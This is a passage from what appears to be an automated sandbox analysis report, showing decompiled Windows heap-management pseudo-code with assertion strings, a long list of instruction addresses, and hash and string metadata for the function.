							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E00AC9819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0xbb8748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E00ACB150();
											} else {
												E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E00ACB150();
											_pop(_t491);
											__eflags =  *0xbb7bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E00B82073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E00B8A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E00AEA830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E00AE7D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E00AE7D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E00B81411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E00AE7D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E00AE7D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0xbb8748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E00ACB150();
							} else {
								E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E00ACB150();
							__eflags =  *0xbb7bc8;
							if( *0xbb7bc8 == 0) {
								__eflags = 0;
								E00B82073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0xbb8748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E00ACB150();
												} else {
													E00ACB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E00ACB150();
												__eflags =  *0xbb7bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E00B82073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E00B8A80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E00AEA830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E00AEB73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E00AEA830(_t553, _v64, _v24);
								_t286 = E00AE7D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E00AE7D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E00B81411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E00AE7D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E00AE7D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E00B81411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E00AF174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E00AEB73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E00AE7D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E00B814FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E00AE99BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E00AEA830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E00AFABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}



















































































                                                                                                        0x00aea309
                                                                                                        0x00aea316
                                                                                                        0x00aea319
                                                                                                        0x00aea31d
                                                                                                        0x00aea32d
                                                                                                        0x00aea331
                                                                                                        0x00b31e0d
                                                                                                        0x00b31e10
                                                                                                        0x00aea3cb
                                                                                                        0x00aea3cb
                                                                                                        0x00aea3bd
                                                                                                        0x00aea3c3
                                                                                                        0x00aea3c3
                                                                                                        0x00aea33a
                                                                                                        0x00b31e17
                                                                                                        0x00b31e1b
                                                                                                        0x00b31e1d
                                                                                                        0x00b31e2f
                                                                                                        0x00b31e34
                                                                                                        0x00b31e36
                                                                                                        0x00b31e3c
                                                                                                        0x00b31e3c
                                                                                                        0x00b31e3c
                                                                                                        0x00b31e3c
                                                                                                        0x00b31e36
                                                                                                        0x00b31e42
                                                                                                        0x00b31e45
                                                                                                        0x00b31e47
                                                                                                        0x00aea3f8
                                                                                                        0x00aea3f8
                                                                                                        0x00aea3fb
                                                                                                        0x00aea3fd
                                                                                                        0x00b31e50
                                                                                                        0x00aea403
                                                                                                        0x00aea411
                                                                                                        0x00aea411
                                                                                                        0x00aea411
                                                                                                        0x00aea41e
                                                                                                        0x00aea420
                                                                                                        0x00aea424
                                                                                                        0x00aea427
                                                                                                        0x00aea7c9
                                                                                                        0x00aea7cd
                                                                                                        0x00aea7d2
                                                                                                        0x00aea7d9
                                                                                                        0x00aea7e0
                                                                                                        0x00aea7e3
                                                                                                        0x00aea7ed
                                                                                                        0x00aea7f3
                                                                                                        0x00aea7f9
                                                                                                        0x00aea7ff
                                                                                                        0x00aea802
                                                                                                        0x00aea807
                                                                                                        0x00aea809
                                                                                                        0x00aea809
                                                                                                        0x00aea809
                                                                                                        0x00aea80f
                                                                                                        0x00aea80f
                                                                                                        0x00aea812
                                                                                                        0x00aea81c
                                                                                                        0x00aea821
                                                                                                        0x00aea824
                                                                                                        0x00aea42d
                                                                                                        0x00aea42d
                                                                                                        0x00aea42d
                                                                                                        0x00aea42d
                                                                                                        0x00aea42d
                                                                                                        0x00aea436
                                                                                                        0x00aea43a
                                                                                                        0x00aea609
                                                                                                        0x00aea60d
                                                                                                        0x00aea612
                                                                                                        0x00aea616
                                                                                                        0x00aea61a
                                                                                                        0x00b31e57
                                                                                                        0x00b31e59
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b31e5f
                                                                                                        0x00aea620
                                                                                                        0x00aea627
                                                                                                        0x00b31e64
                                                                                                        0x00b31e66
                                                                                                        0x00b31e6c
                                                                                                        0x00b31e72
                                                                                                        0x00b31e76
                                                                                                        0x00b31e95
                                                                                                        0x00b31e9a
                                                                                                        0x00b31e78
                                                                                                        0x00b31e8d
                                                                                                        0x00b31e92
                                                                                                        0x00b31ea0
                                                                                                        0x00b31ea5
                                                                                                        0x00b31eaa
                                                                                                        0x00b31eb2
                                                                                                        0x00b31eb6
                                                                                                        0x00b31eb9
                                                                                                        0x00b31eb9
                                                                                                        0x00b31ebe
                                                                                                        0x00b31ec2
                                                                                                        0x00b31ec2
                                                                                                        0x00b31e66
                                                                                                        0x00aea62d
                                                                                                        0x00aea633
                                                                                                        0x00aea636
                                                                                                        0x00aea63a
                                                                                                        0x00aea63c
                                                                                                        0x00aea640
                                                                                                        0x00aea642
                                                                                                        0x00aea644
                                                                                                        0x00aea644
                                                                                                        0x00aea644
                                                                                                        0x00aea64d
                                                                                                        0x00aea64d
                                                                                                        0x00aea651
                                                                                                        0x00aea655
                                                                                                        0x00b31eca
                                                                                                        0x00b31ed1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b31ed7
                                                                                                        0x00000000
                                                                                                        0x00aea65b
                                                                                                        0x00aea669
                                                                                                        0x00aea66e
                                                                                                        0x00aea670
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00aea676
                                                                                                        0x00aea67b
                                                                                                        0x00aea680
                                                                                                        0x00aea682
                                                                                                        0x00b31f1a
                                                                                                        0x00aea688
                                                                                                        0x00aea688
                                                                                                        0x00aea688
                                                                                                        0x00aea68a
                                                                                                        0x00aea68d
                                                                                                        0x00b31f24
                                                                                                        0x00b31f2a
                                                                                                        0x00b31f31
                                                                                                        0x00b31f43
                                                                                                        0x00b31f43
                                                                                                        0x00b31f31
                                                                                                        0x00aea693
                                                                                                        0x00aea697
                                                                                                        0x00aea69d
                                                                                                        0x00aea6a0
                                                                                                        0x00aea6a6
                                                                                                        0x00aea6a8
                                                                                                        0x00aea6a8
                                                                                                        0x00aea6a8
                                                                                                        0x00aea6a8
                                                                                                        0x00aea6b2
                                                                                                        0x00aea6b7
                                                                                                        0x00aea6c1
                                                                                                        0x00aea6c6
                                                                                                        0x00aea6d2
                                                                                                        0x00aea6d9
                                                                                                        0x00aea6e3
                                                                                                        0x00aea6e6
                                                                                                        0x00aea6eb
                                                                                                        0x00aea6ed
                                                                                                        0x00aea6ed
                                                                                                        0x00aea6ed
                                                                                                        0x00aea6ed
                                                                                                        0x00aea6f3
                                                                                                        0x00aea6f8
                                                                                                        0x00aea702
                                                                                                        0x00aea70a
                                                                                                        0x00aea70e
                                                                                                        0x00aea71a
                                                                                                        0x00aea71e
                                                                                                        0x00b31fcb
                                                                                                        0x00b31fcf
                                                                                                        0x00b31fdd
                                                                                                        0x00b31fe3
                                                                                                        0x00b31fe3
                                                                                                        0x00aea724
                                                                                                        0x00aea728
                                                                                                        0x00aea72a
                                                                                                        0x00aea72d
                                                                                                        0x00aea737
                                                                                                        0x00aea73a
                                                                                                        0x00aea73c
                                                                                                        0x00aea742
                                                                                                        0x00aea748
                                                                                                        0x00b31f4d
                                                                                                        0x00b31f50
                                                                                                        0x00b31f56
                                                                                                        0x00b31f5c
                                                                                                        0x00b31f5f
                                                                                                        0x00b31f7e
                                                                                                        0x00b31f83
                                                                                                        0x00b31f61
                                                                                                        0x00b31f76
                                                                                                        0x00b31f7b
                                                                                                        0x00b31f89
                                                                                                        0x00b31f8e
                                                                                                        0x00b31f93
                                                                                                        0x00b31f94
                                                                                                        0x00b31f9a
                                                                                                        0x00b31f9c
                                                                                                        0x00b31f9e
                                                                                                        0x00b31fa1
                                                                                                        0x00b31fa1
                                                                                                        0x00b31fa6
                                                                                                        0x00b31fa6
                                                                                                        0x00b31f50
                                                                                                        0x00aea74e
                                                                                                        0x00aea751
                                                                                                        0x00aea754
                                                                                                        0x00aea75d
                                                                                                        0x00aea75e
                                                                                                        0x00aea762
                                                                                                        0x00aea767
                                                                                                        0x00b31faf
                                                                                                        0x00b31fb0
                                                                                                        0x00b31fb9
                                                                                                        0x00b31fbe
                                                                                                        0x00b31fc2
                                                                                                        0x00b31fc2
                                                                                                        0x00aea76d
                                                                                                        0x00aea76d
                                                                                                        0x00aea775
                                                                                                        0x00aea778
                                                                                                        0x00aea77d
                                                                                                        0x00aea77d
                                                                                                        0x00aea71e
                                                                                                        0x00aea782
                                                                                                        0x00aea787
                                                                                                        0x00aea789
                                                                                                        0x00b31ff3
                                                                                                        0x00aea78f
                                                                                                        0x00aea78f
                                                                                                        0x00aea78f
                                                                                                        0x00aea791
                                                                                                        0x00aea794
                                                                                                        0x00b31ffd
                                                                                                        0x00b32006
                                                                                                        0x00b3200c
                                                                                                        0x00b32017
                                                                                                        0x00b32019
                                                                                                        0x00b32024
                                                                                                        0x00b32024
                                                                                                        0x00b32024
                                                                                                        0x00b32047
                                                                                                        0x00b32047
                                                                                                        0x00b3200c
                                                                                                        0x00aea79a
                                                                                                        0x00aea79f
                                                                                                        0x00aea7a4
                                                                                                        0x00aea7a9
                                                                                                        0x00aea7ab
                                                                                                        0x00b3205a
                                                                                                        0x00aea7b1
                                                                                                        0x00aea7b1
                                                                                                        0x00aea7b1
                                                                                                        0x00aea7b3
                                                                                                        0x00aea7b6
                                                                                                        0x00000000
                                                                                                        0x00aea7bc
                                                                                                        0x00b32066
                                                                                                        0x00b32068
                                                                                                        0x00b32073
                                                                                                        0x00b32073
                                                                                                        0x00b32073
                                                                                                        0x00b32078
                                                                                                        0x00b32079
                                                                                                        0x00b3207d
                                                                                                        0x00000000
                                                                                                        0x00b3207d
                                                                                                        0x00aea7b6
                                                                                                        0x00aea440
                                                                                                        0x00aea440
                                                                                                        0x00aea440
                                                                                                        0x00aea446
                                                                                                        0x00aea44c
                                                                                                        0x00aea44f
                                                                                                        0x00aea453
                                                                                                        0x00aea455
                                                                                                        0x00b320b3
                                                                                                        0x00b320b9
                                                                                                        0x00b320b9
                                                                                                        0x00aea45d
                                                                                                        0x00aea460
                                                                                                        0x00aea464
                                                                                                        0x00aea466
                                                                                                        0x00aea46b
                                                                                                        0x00aea46f
                                                                                                        0x00aea471
                                                                                                        0x00aea471
                                                                                                        0x00aea471
                                                                                                        0x00aea474
                                                                                                        0x00aea479
                                                                                                        0x00aea47d
                                                                                                        0x00aea47f
                                                                                                        0x00b32229
                                                                                                        0x00b3222f
                                                                                                        0x00aea3c8
                                                                                                        0x00aea3c8
                                                                                                        0x00aea3ca
                                                                                                        0x00aea3ca
                                                                                                        0x00000000
                                                                                                        0x00aea3ca
                                                                                                        0x00b32235
                                                                                                        0x00b3223a
                                                                                                        0x00b3223a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b32240
                                                                                                        0x00b32246
                                                                                                        0x00b3224a
                                                                                                        0x00b32269
                                                                                                        0x00b3226e
                                                                                                        0x00b3224c
                                                                                                        0x00b32261
                                                                                                        0x00b32266
                                                                                                        0x00b32274
                                                                                                        0x00b32279
                                                                                                        0x00b3227e
                                                                                                        0x00b32286
                                                                                                        0x00b32288
                                                                                                        0x00b3228d
                                                                                                        0x00b3228d
                                                                                                        0x00b32292
                                                                                                        0x00b32292
                                                                                                        0x00b32295
                                                                                                        0x00b32295
                                                                                                        0x00000000
                                                                                                        0x00b32295
                                                                                                        0x00aea485
                                                                                                        0x00aea489
                                                                                                        0x00aea48b
                                                                                                        0x00aea48f
                                                                                                        0x00aea493
                                                                                                        0x00aea497
                                                                                                        0x00aea49b
                                                                                                        0x00aea4bb
                                                                                                        0x00aea4bb
                                                                                                        0x00aea4bd
                                                                                                        0x00aea4ff
                                                                                                        0x00aea4ff
                                                                                                        0x00aea501
                                                                                                        0x00aea505
                                                                                                        0x00aea50f
                                                                                                        0x00aea517
                                                                                                        0x00aea51b
                                                                                                        0x00aea527
                                                                                                        0x00aea52b
                                                                                                        0x00b32182
                                                                                                        0x00b32185
                                                                                                        0x00b32193
                                                                                                        0x00b32199
                                                                                                        0x00b32199
                                                                                                        0x00aea531
                                                                                                        0x00aea535
                                                                                                        0x00aea538
                                                                                                        0x00aea548
                                                                                                        0x00aea54b
                                                                                                        0x00aea54d
                                                                                                        0x00aea553
                                                                                                        0x00aea559
                                                                                                        0x00b32100
                                                                                                        0x00b32103
                                                                                                        0x00b32109
                                                                                                        0x00b3210f
                                                                                                        0x00b32112
                                                                                                        0x00b32131
                                                                                                        0x00b32136
                                                                                                        0x00b32114
                                                                                                        0x00b32129
                                                                                                        0x00b3212e
                                                                                                        0x00b3213c
                                                                                                        0x00b32141
                                                                                                        0x00b32147
                                                                                                        0x00b3214d
                                                                                                        0x00b32151
                                                                                                        0x00b32154
                                                                                                        0x00b32154
                                                                                                        0x00b32159
                                                                                                        0x00b32159
                                                                                                        0x00b32103
                                                                                                        0x00aea55f
                                                                                                        0x00aea562
                                                                                                        0x00aea565
                                                                                                        0x00aea567
                                                                                                        0x00b32162
                                                                                                        0x00aea56d
                                                                                                        0x00aea574
                                                                                                        0x00aea575
                                                                                                        0x00aea579
                                                                                                        0x00aea57e
                                                                                                        0x00b32169
                                                                                                        0x00b3216a
                                                                                                        0x00b32170
                                                                                                        0x00b32175
                                                                                                        0x00b32179
                                                                                                        0x00b32179
                                                                                                        0x00aea57e
                                                                                                        0x00aea584
                                                                                                        0x00aea58f
                                                                                                        0x00aea58f
                                                                                                        0x00aea52b
                                                                                                        0x00aea5ad
                                                                                                        0x00aea5bc
                                                                                                        0x00aea5c1
                                                                                                        0x00aea5c6
                                                                                                        0x00aea5cb
                                                                                                        0x00aea5cd
                                                                                                        0x00b321a9
                                                                                                        0x00aea5d3
                                                                                                        0x00aea5d3
                                                                                                        0x00aea5d3
                                                                                                        0x00aea5d5
                                                                                                        0x00aea5d8
                                                                                                        0x00b321b3
                                                                                                        0x00b321bc
                                                                                                        0x00b321c2
                                                                                                        0x00b321cd
                                                                                                        0x00b321cf
                                                                                                        0x00b321da
                                                                                                        0x00b321da
                                                                                                        0x00b321da
                                                                                                        0x00b321f7
                                                                                                        0x00b321f7
                                                                                                        0x00b321c2
                                                                                                        0x00aea5de
                                                                                                        0x00aea5e3
                                                                                                        0x00aea5e8
                                                                                                        0x00aea5ea
                                                                                                        0x00b3220a
                                                                                                        0x00aea5f0
                                                                                                        0x00aea5f0
                                                                                                        0x00aea5f0
                                                                                                        0x00aea5f2
                                                                                                        0x00aea5f5
                                                                                                        0x00b32219
                                                                                                        0x00b3221b
                                                                                                        0x00b3208c
                                                                                                        0x00b3208c
                                                                                                        0x00b3208c
                                                                                                        0x00b32095
                                                                                                        0x00b32096
                                                                                                        0x00b32097
                                                                                                        0x00b32098
                                                                                                        0x00b320a4
                                                                                                        0x00b320a5
                                                                                                        0x00b320a9
                                                                                                        0x00b320a9
                                                                                                        0x00000000
                                                                                                        0x00aea5f5
                                                                                                        0x00aea4bf
                                                                                                        0x00aea4d3
                                                                                                        0x00aea4d8
                                                                                                        0x00aea4da
                                                                                                        0x00b31ede
                                                                                                        0x00b31ede
                                                                                                        0x00b31ee4
                                                                                                        0x00b31ee9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b31f07
                                                                                                        0x00000000
                                                                                                        0x00b31f07
                                                                                                        0x00aea4e0
                                                                                                        0x00aea4e5
                                                                                                        0x00aea4e7
                                                                                                        0x00b320cb
                                                                                                        0x00aea4ed
                                                                                                        0x00aea4ed
                                                                                                        0x00aea4ed
                                                                                                        0x00aea4f2
                                                                                                        0x00aea4f5
                                                                                                        0x00b320d5
                                                                                                        0x00b320de
                                                                                                        0x00b320e4
                                                                                                        0x00b320f6
                                                                                                        0x00b320f6
                                                                                                        0x00b320e4
                                                                                                        0x00aea4fb
                                                                                                        0x00000000
                                                                                                        0x00aea4fb
                                                                                                        0x00aea4a1
                                                                                                        0x00aea4a4
                                                                                                        0x00aea4a8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00aea4aa
                                                                                                        0x00aea4ac
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00aea4b2
                                                                                                        0x00aea4b5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00aea4b5
                                                                                                        0x00aea43a
                                                                                                        0x00aea340
                                                                                                        0x00aea346
                                                                                                        0x00aea600
                                                                                                        0x00000000
                                                                                                        0x00aea600
                                                                                                        0x00aea34f
                                                                                                        0x00aea351
                                                                                                        0x00aea358
                                                                                                        0x00aea3c6
                                                                                                        0x00000000
                                                                                                        0x00aea371
                                                                                                        0x00aea37a
                                                                                                        0x00aea37f
                                                                                                        0x00aea382
                                                                                                        0x00aea384
                                                                                                        0x00aea394
                                                                                                        0x00000000
                                                                                                        0x00aea396
                                                                                                        0x00aea399
                                                                                                        0x00aea3a7
                                                                                                        0x00aea3b0
                                                                                                        0x00aea3b4
                                                                                                        0x00aea3bb
                                                                                                        0x00aea3d2
                                                                                                        0x00aea3da
                                                                                                        0x00aea3df
                                                                                                        0x00aea3e1
                                                                                                        0x00aea3e5
                                                                                                        0x00aea3ea
                                                                                                        0x00aea3f0
                                                                                                        0x00aea3f0
                                                                                                        0x00aea3e1
                                                                                                        0x00000000
                                                                                                        0x00aea3bb
                                                                                                        0x00aea394

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                        • API String ID: 0-523794902
                                                                                                        • Opcode ID: 2fce07704839349863d064a9ca8a2257766ae816f486f685e027c0bdf3032e51
                                                                                                        • Instruction ID: cafc4ddaa7a7118208ff507bc4626fb4c26f13ce9207011d4ee0743c1c81792c
                                                                                                        • Opcode Fuzzy Hash: 2fce07704839349863d064a9ca8a2257766ae816f486f685e027c0bdf3032e51
                                                                                                        • Instruction Fuzzy Hash: 5842EF316087819FC715DF29C984B2ABBE5FF98304F2849ADF4868B352D734E945CB52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B82D82, Relevance: 7.7, Strings: 6, Instructions: 228COMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 64%
                                                                                                        			E00B82D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0xba0e80);
				E00B1D0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
